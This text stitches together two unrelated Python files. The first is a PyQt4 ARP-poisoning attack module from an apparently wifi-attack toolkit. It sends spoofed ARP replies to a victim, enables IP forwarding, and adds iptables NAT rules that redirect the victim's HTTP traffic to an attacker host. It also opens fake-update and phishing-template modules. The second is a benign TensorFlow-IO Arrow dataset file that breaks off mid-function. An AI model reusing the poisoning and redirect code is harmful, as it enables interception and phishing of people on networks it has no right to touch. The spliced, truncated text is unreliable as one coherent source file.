#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from Core.Settings import frm_Settings
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleTemplates import frm_template
from Modules.utils import ProcessThread,Refactor,ThreadScan
from os import popen,chdir,getcwd,getuid,devnull,system
from scapy.all import *
import threading
from urllib2 import urlopen,URLError
from re import search,compile
from multiprocessing import Process,Manager
from time import sleep
threadloading = {'template':[],'posion':[]}
class frm_Arp(QMainWindow):
def __init__(self, parent=None):
super(frm_Arp, self).__init__(parent)
self.form_widget = frm_Arp_Poison(self)
self.setCentralWidget(self.form_widget)
class ThreadAttackPosion(QThread):
def __init__(self,victim,gateway,mac):
QThread.__init__(self)
self.victim = victim
self.gateway = gateway
self.mac = mac
self.process = True
def run(self):
print 'Starting Thread:' + self.objectName()
while self.process:
arp = ARP(op=1,psrc=self.gateway,pdst=self.victim,hwdst=self.mac)
send(arp,verbose=False)
sleep(2)
def stop(self):
self.process = False
print 'Stop thread:' + self.objectName()
self.emit(SIGNAL('Activated( QString )'),'Ok')
class frm_Arp_Poison(QWidget):
def __init__(self, parent=None):
super(frm_Arp_Poison, self).__init__(parent)
self.setWindowTitle('Arp Posion Attack ')
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.Main = QVBoxLayout()
self.owd = getcwd()
self.control = False
self.interfaces = Refactor.get_interfaces()
self.configure = frm_Settings()
self.loadtheme(self.configure.XmlThemeSelected())
self.module_network = Refactor
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
self.ThreadDirc = {'Arp_posion':[]}
global threadloading
self.GUI()
def closeEvent(self, event):
if (len(self.ThreadDirc['Arp_posion']) != 0) or len(threadloading['template']) !=0:
reply = QMessageBox.question(self, 'About Exit','Are you sure to close ArpPosion?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
try:
for i in self.ThreadDirc['Arp_posion']:
i.stop(),i.join()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
except:pass
self.deleteLater()
else:
pass
else:
event.ignore()
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def GUI(self):
self.form =QFormLayout()
self.movie = QMovie('rsc/loading2.gif', QByteArray(), self)
size = self.movie.scaledSize()
self.setGeometry(200, 200, size.width(), size.height())
self.movie_screen = QLabel()
self.movie_screen.setFixedHeight(200)
self.movie_screen.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.movie_screen.setAlignment(Qt.AlignCenter)
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.setSpeed(100)
self.movie_screen.setMovie(self.movie)
self.movie_screen.setDisabled(False)
self.movie.start()
self.tables = QTableWidget(5,3)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.list_clicked_scan)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,145)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.txt_target = QLineEdit(self)
self.txt_gateway = QLineEdit(self)
self.txt_redirect = QLineEdit(self)
self.txt_mac = QLineEdit(self)
self.ip_range = QLineEdit(self)
self.txt_status_scan = QLabel('')
self.txt_statusarp = QLabel('')
self.txt_status_phishing = QLabel('')
self.StatusMonitor(False,'stas_scan')
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
scan_range = self.configure.xmlSettings('scan','rangeIP',None,False)
self.ip_range.setText(scan_range)
self.btn_start_scanner = QPushButton('Scan')
self.btn_stop_scanner = QPushButton('Stop')
self.btn_Attack_Posion = QPushButton('Start Attack')
self.btn_Stop_Posion = QPushButton('Stop Attack')
self.btn_server = QPushButton('Templates')
self.btn_windows_update = QPushButton('Fake Update')
self.btn_server.setFixedHeight(22)
self.btn_stop_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedHeight(22)
self.btn_stop_scanner.setFixedHeight(22)
self.btn_windows_update.setFixedHeight(22)
self.btn_start_scanner.clicked.connect(self.Start_scan)
self.btn_stop_scanner.clicked.connect(self.Stop_scan)
self.btn_Attack_Posion.clicked.connect(self.Start_Attack)
self.btn_Stop_Posion.clicked.connect(self.kill_attack)
self.btn_server.clicked.connect(self.show_template_dialog)
self.btn_windows_update.clicked.connect(self.show_frm_fake)
#icons
self.btn_start_scanner.setIcon(QIcon('rsc/network.png'))
self.btn_Attack_Posion.setIcon(QIcon('rsc/start.png'))
self.btn_Stop_Posion.setIcon(QIcon('rsc/Stop.png'))
self.btn_stop_scanner.setIcon(QIcon('rsc/network_off.png'))
self.btn_server.setIcon(QIcon('rsc/page.png'))
self.btn_windows_update.setIcon(QIcon('rsc/winUp.png'))
self.grid0 = QGridLayout()
self.grid0.minimumSize()
self.grid0.addWidget(QLabel('ArpPosion:'),0,2)
self.grid0.addWidget(QLabel('Phishing:'),0,4)
self.grid0.addWidget(QLabel('Scanner:'),0,0)
self.grid0.addWidget(self.txt_status_scan,0,1)
self.grid0.addWidget(self.txt_statusarp,0,3)
self.grid0.addWidget(self.txt_status_phishing,0,5)
# grid options
self.grid1 = QGridLayout()
self.grid1.addWidget(self.btn_start_scanner,0,0)
self.grid1.addWidget(self.btn_stop_scanner,0,1)
self.grid1.addWidget(self.btn_server,0,2)
self.grid1.addWidget(self.btn_windows_update, 0,3)
#btn
self.grid2 = QGridLayout()
self.grid2.addWidget(self.btn_Attack_Posion,1,0)
self.grid2.addWidget(self.btn_Stop_Posion,1,5)
x = self.interfaces
if x['gateway'] != None:
self.txt_gateway.setText(x['gateway'])
self.txt_redirect.setText(x['IPaddress'])
self.txt_mac.setText(Refactor.getHwAddr(x['activated']))
self.form0 = QGridLayout()
self.form0.addWidget(self.movie_screen,0,0)
self.form0.addWidget(self.tables,0,0)
self.form.addRow(self.form0)
self.form.addRow(self.grid1)
self.form.addRow('Target:', self.txt_target)
self.form.addRow('Gateway:', self.txt_gateway)
self.form.addRow('MAC address:', self.txt_mac)
self.form.addRow('Redirect IP:', self.txt_redirect)
self.form.addRow('IP ranger Scan:',self.ip_range)
self.form.addRow(self.grid0)
self.form.addRow(self.grid2)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def thread_scan_reveice(self,info_ip):
self.StatusMonitor(False,'stas_scan')
self.movie_screen.setDisabled(False)
self.tables.setVisible(True)
data = info_ip.split('|')
Headers = []
self.data['IPaddress'].append(data[0])
self.data['MacAddress'].append(data[1])
self.data['Hostname'].append(data[2])
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def show_frm_fake(self):
self.n = frm_update_attack()
self.n.setGeometry(QRect(100, 100, 450, 300))
self.n.show()
def emit_template(self,log):
if log == 'started':
self.StatusMonitor(True,'stas_phishing')
def show_template_dialog(self):
self.Ftemplates = frm_template()
self.connect(self.Ftemplates,SIGNAL('Activated ( QString ) '), self.emit_template)
self.Ftemplates.setWindowTitle('Templates Phishing Attack')
self.Ftemplates.txt_redirect.setText(self.txt_redirect.text())
self.Ftemplates.show()
def kill_attack(self):
for i in self.ThreadDirc['Arp_posion']:
i.stop()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
try:
self.Ftemplates.killThread()
except:pass
chdir(self.owd)
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
self.conf_attack(False)
Refactor.set_ip_forward(0)
@pyqtSlot(QModelIndex)
def check_options(self,index):
if self.check_face.isChecked():
self.check_route.setChecked(False)
self.check_gmail.setChecked(False)
elif self.check_gmail.isChecked():
self.check_face.setChecked(False)
self.check_route.setChecked(False)
else:
self.check_face.setChecked(False)
self.check_gmail.setChecked(False)
def StopArpAttack(self,data):
self.StatusMonitor(False,'stas_arp')
def Start_Attack(self):
if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0:
QMessageBox.information(self, 'Error Arp Attacker', 'you need set the input correctly')
else:
chdir(self.owd)
if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0:
if len(self.txt_redirect.text()) != 0:
self.StatusMonitor(True,'stas_arp')
Refactor.set_ip_forward(1)
self.conf_attack(True)
thr = ThreadAttackPosion(str(self.txt_target.text()),
str(self.txt_gateway.text()),
str(self.txt_mac.text()))
self.connect(thr,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
thr.setObjectName('Arp Posion')
self.ThreadDirc['Arp_posion'].append(thr)
thr.start()
def conf_attack(self,bool_conf):
if bool_conf:
self.ip = self.txt_redirect.text()
if len(self.ip) != 0:
iptables = [
'iptables -t nat --flush',
'iptables -A FORWARD --in-interface '+str(self.txt_gateway.text())+' -j ACCEPT',
'iptables -t nat --append POSTROUTING --out-interface ' +self.interfaces['activated'] +' -j MASQUERADE',
'iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination '+self.ip
]
for i in iptables:
try:system(i)
except:pass
else:
QMessageBox.information(self,'Error Redirect IP','Redirect IP not found')
else:
nano = [
'iptables --flush',
'iptables --table nat --flush' ,\
'iptables --delete-chain', 'iptables --table nat --delete-chain'
]
for delete in nano: popen(delete)
def Start_scan(self):
self.StatusMonitor(True,'stas_scan')
threadscan_check = self.configure.xmlSettings('advanced','Function_scan',None,False)
self.tables.clear()
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
if threadscan_check == 'Nmap':
try:
from nmap import PortScanner
except ImportError:
QMessageBox.information(self,'Error Nmap','The modules python-nmap not installed')
return
if self.txt_gateway.text() != '':
self.movie_screen.setDisabled(True)
self.tables.setVisible(False)
config_gateway = str(self.txt_gateway.text())
scan = ''
config_gateway = config_gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
self.ThreadScanner = ThreadScan(scan + '0/24')
self.connect(self.ThreadScanner,SIGNAL('Activated ( QString ) '), self.thread_scan_reveice)
self.StatusMonitor(True,'stas_scan')
self.ThreadScanner.start()
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
elif threadscan_check == 'Ping':
if self.txt_gateway.text() != '':
config = str(self.txt_gateway.text())
t = threading.Thread(target=self.scanner_network,args=(config,))
t.daemon = True
t.start(),t.join()
self.StatusMonitor(False,'stas_scan')
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
else:
QMessageBox.information(self,'Error on select thread Scan','thread scan not selected.')
def working(self,ip,lista):
with open(devnull, 'wb') as limbo:
result=subprocess.Popen(['ping', '-c', '1', '-n', '-W', '1', ip],
stdout=limbo, stderr=limbo).wait()
if not result:
print('online',ip)
lista[ip] = ip + '|' + self.module_network.get_mac(ip)
def scanner_network(self,gateway):
scan = ''
config_gateway = gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
gateway = scan
ranger = str(self.ip_range.text()).split('-')
jobs = []
manager = Manager()
on_ips = manager.dict()
for n in xrange(int(ranger[0]),int(ranger[1])):
ip='%s{0}'.format(n)%(gateway)
p = Process(target=self.working,args=(ip,on_ips))
jobs.append(p)
p.start()
for i in jobs: i.join()
for i in on_ips.values():
Headers = []
n = i.split('|')
self.data['IPaddress'].append(n[0])
self.data['MacAddress'].append(n[1])
self.data['Hostname'].append('<unknown>')
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def Stop_scan(self):
self.ThreadScanner.terminate()
self.StatusMonitor(False,'stas_scan')
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.tables.setVisible(True)
def StatusMonitor(self,bool,wid):
if bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ ON ]')
self.txt_status_scan.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ OFF ]')
self.txt_status_scan.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ ON ]')
self.txt_statusarp.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ OFF ]')
self.txt_statusarp.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ ON ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ OFF ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : red; }')
@pyqtSlot(QModelIndex)
def list_clicked_scan(self, index):
item = self.tables.selectedItems()
if item != []:
self.txt_target.setText(item[0].text())
else:
self.txt_target.clear()
|
arrow_dataset_ops.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io.python.ops import core_ops
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
"""Convert Arrow type to tuple of (Tensor dtype, shape dims).
This function requires pyarrow to be installed.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
shape_dims = [] # initialize shape as scalar
if pa.types.is_boolean(pa_t):
tf_t = dtypes.bool
elif pa.types.is_int8(pa_t):
tf_t = dtypes.int8
elif pa.types.is_int16(pa_t):
tf_t = dtypes.int16
elif pa.types.is_int32(pa_t):
tf_t = dtypes.int32
elif pa.types.is_int64(pa_t):
tf_t = dtypes.int64
elif pa.types.is_uint8(pa_t):
tf_t = dtypes.uint8
elif pa.types.is_uint16(pa_t):
tf_t = dtypes.uint16
elif pa.types.is_uint32(pa_t):
tf_t = dtypes.uint32
elif pa.types.is_uint64(pa_t):
tf_t = dtypes.uint64
elif pa.types.is_float16(pa_t):
tf_t = dtypes.float16
elif pa.types.is_float32(pa_t):
tf_t = dtypes.float32
elif pa.types.is_float64(pa_t):
tf_t = dtypes.float64
elif pa.types.is_string(pa_t):
tf_t = dtypes.string
elif pa.types.is_list(pa_t):
if pa.types.is_list(pa_t.value_type):
raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
shape_dims.append(None) # pyarrow scalar arrays can be variable length
else:
raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
return tf_t, shape_dims
def arrow_schema_to_tensor_types(schema):
"""Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
This function requires pyarrow to be installed.
"""
type_shape_list = [arrow_to_tensor_type(field.type) for field in schema]
tensor_types, shape_dims = zip(*type_shape_list)
tensor_shapes = tuple(tf.TensorShape(s) for s in shape_dims)
return tensor_types, tensor_shapes
class ArrowBaseDataset(dataset_ops.DatasetV2):
"""Base class for Arrow Datasets to provide columns used in record batches
and corresponding output tensor types, shapes and classes.
"""
batch_modes_supported = ("keep_remainder", "drop_remainder", "auto")
def __init__(
self,
make_variant_fn,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
self._columns = columns
self._structure = structure_lib.convert_legacy_structure(
output_types,
output_shapes
or nest.map_structure(lambda _: tf.TensorShape(None), output_types),
nest.map_structure(lambda _: tf.Tensor, output_types),
)
self._batch_size = tf.convert_to_tensor(
batch_size or 0, dtype=dtypes.int64, name="batch_size"
)
if batch_mode not in self.batch_modes_supported:
raise ValueError(
"Unsupported batch_mode: '{}', must be one of {}".format(
batch_mode, self.batch_modes_supported
)
)
self._batch_mode = tf.convert_to_tensor(
batch_mode, dtypes.string, name="batch_mode"
)
if batch_size is not None or batch_mode == "auto":
spec_batch_size = batch_size if batch_mode == "drop_remainder" else None
# pylint: disable=protected-access
self._structure = nest.map_structure(
lambda component_spec: component_spec._batch(spec_batch_size),
self._structure,
)
variant_tensor = make_variant_fn(
columns=self._columns,
batch_size=self._batch_size,
batch_mode=self._batch_mode,
**self._flat_structure,
)
super().__init__(variant_tensor)
def _inputs(self):
return []
@property
def element_spec(self):
return self._structure
@property
def columns(self):
return self._columns
@property
def batch_size(self):
return self._batch_size
@property
def batch_mode(self):
return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
"""An Arrow Dataset from record batches in memory, or a Pandas DataFrame."""
def __init__(
self,
serialized_batches,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
arrow_buffer=None,
):
"""Create an ArrowDataset from a Tensor of serialized batches.
This constructor requires pyarrow to be installed.
Args:
serialized_batches: A string Tensor as a serialized buffer containing
Arrow record batches in Arrow File format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched Tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
arrow_buffer: Optional Arrow Buffer containing Arrow record batches in
Arrow File format. This will share the Arrow buffer with
the C++ kernel by address for zero-copy. Only supported if
the kernel process is local, with TensorFlow in eager mode.
If this is used, set `serialized_batches` to `None`.
"""
if serialized_batches is not None:
make_variant_fn = partial(
core_ops.io_arrow_serialized_dataset, serialized_batches
)
elif arrow_buffer is None:
raise ValueError("Must set either serialzied_batches or arrow_buffer")
elif not tf.executing_eagerly():
raise ValueError(
"Using arrow_buffer for zero-copy only supported in "
"TensorFlow Eager mode."
)
else:
address_int = arrow_buffer.address
buffer_address = tf.convert_to_tensor(
address_int, dtype=dtypes.uint64, name="buffer_address"
)
buffer_size = tf.convert_to_tensor(
arrow_buffer.size, dtype=dtypes.int64, name="buffer_size"
)
make_variant_fn = partial(
core_ops.io_arrow_zero_copy_dataset, buffer_address, buffer_size
)
# Keep a reference to the arrow buffers used
self._arrow_buffer_refs = [arrow_buffer]
super().__init__(
make_variant_fn,
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_record_batches(
cls,
record_batches,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset directly from Arrow record batches.
This constructor requires pyarrow to be installed.
Args:
record_batches: An Arrow record batch or sequence of record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
columns: A list of column indices to be used in the Dataset
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(record_batches, pa.RecordBatch):
record_batches = [record_batches]
if columns is None:
columns = tuple(range(record_batches[0].num_columns))
assert record_batches
if tf.executing_eagerly():
sink = pa.BufferOutputStream()
writer = pa.RecordBatchFileWriter(sink, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = None
arrow_buffer = sink.getvalue()
else:
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = tf.convert_to_tensor(
buf.getvalue(), dtype=dtypes.string, name="serialized_batches"
)
arrow_buffer = None
return cls(
serialized_batches,
columns,
output_types,
output_shapes,
batch_size=batch_size,
batch_mode=batch_mode,
arrow_buffer=arrow_buffer,
)
@classmethod
def from_pandas(
cls,
df,
columns=None,
preserve_index=True,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from a given Pandas DataFrame. Output types
and shapes are inferred from the Arrow schema after DataFrame conversion.
If preserve_index is True, the DataFrame index will be the last column.
This method requires pyarrow to be installed.
Args:
df: a Pandas DataFrame
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if columns is not None:
df = df.iloc[:, list(columns)]
batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
columns = tuple(range(batch.num_columns))
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
batch,
output_types,
output_shapes,
columns=columns,
batch_size=batch_size,
batch_mode=batch_mode,
)
class ArrowFeatherDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from Arrow feather files.
Feather is a light-weight columnar format ideal for simple writing of
Pandas DataFrames. Pyarrow can be used for reading/writing Feather files,
see https://arrow.apache.org/docs/python/ipc.html#feather-format
"""
def __init__(
self,
filenames,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from one or more Feather file names.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
filenames = tf.convert_to_tensor(
filenames, dtype=dtypes.string, name="filenames"
)
super().__init__(
partial(core_ops.io_arrow_feather_dataset, filenames),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
filenames,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset for reading record batches from Arrow feather
files, inferring output types and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
filenames, columns, output_types, output_shapes, batch_size, batch_mode
)
class ArrowStreamDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from an input stream.
Currently supported input streams are a socket client or stdin.
"""
def __init__(
self,
endpoints,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from an input stream.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
endpoints = tf.convert_to_tensor(
endpoints, dtype=dtypes.string, name="endpoints"
)
super().__init__(
partial(core_ops.io_arrow_stream_dataset, endpoints),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
endpoints,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset from an input stream, inferring output types
and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
endpoints, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_record_batches(
cls,
record_batch_iter,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
record_batch_iter_factory=None,
):
"""Create an ArrowStreamDataset by serving a sequence of Arrow record
batches in a background thread. This constructor requires pyarrow to
be installed.
Args:
record_batch_iter: A sequence or iterator of Arrow record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
columns: Optional list of column indices to be used, if None all are used
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
record_batch_iter_factory: Optional factory to create additional record
batch iterators for multiple iterations.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
# Create a UDS server by default if not Windows
if os.name != "nt":
sock_path = os.path.join(tempfile.gettempdir(), "arrow_io_stream.sock")
endpoint = f"unix://{sock_path}"
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(sock_path)
# Create a TCP server
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))
host_addr, port = sock.getsockname()
endpoint = f"{host_addr}:{port}"
sock.listen(1)
def run_server():
"""serve record batches"""
curr_iter = record_batch_iter
while True:
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = None
try:
for batch in curr_iter:
if writer is None:
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
writer.write_batch(batch)
if record_batch_iter_factory is not None:
curr_iter = record_batch_iter_factory()
finally:
if writer is not None:
writer.close()
outfile.close()
conn.close()
sock.close()
# Run the server in a thread
server = threading.Thread(target=run_server)
server.daemon = True
server.start()
if columns is None:
columns = list(range(len(output_types)))
return cls(
endpoint, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_pandas(
cls, data_frames, columns=None, preserve_index=True, batch_size=None
):
"""Create an ArrowStreamDataset by serving a DataFrame, or batches of a
DataFrame in a background thread. This constructor requires pandas and
pyarrow to be installed.
Args:
data_frames: A Pandas DataFrame or sequence of DataFrames
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: Currently, only 'keep_remainder' batch mode supported
"""
import pandas as pd # pylint: disable=import-outside-toplevel
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(data_frames, pd.DataFrame):
data_frames = [data_frames]
def gen_record_batches():
"""record batch generator"""
for df in data_frames:
if columns is not None:
df = df.iloc[:, list(columns)]
# If batching, slice DataFrame and convert to record batches
if batch_size is not None:
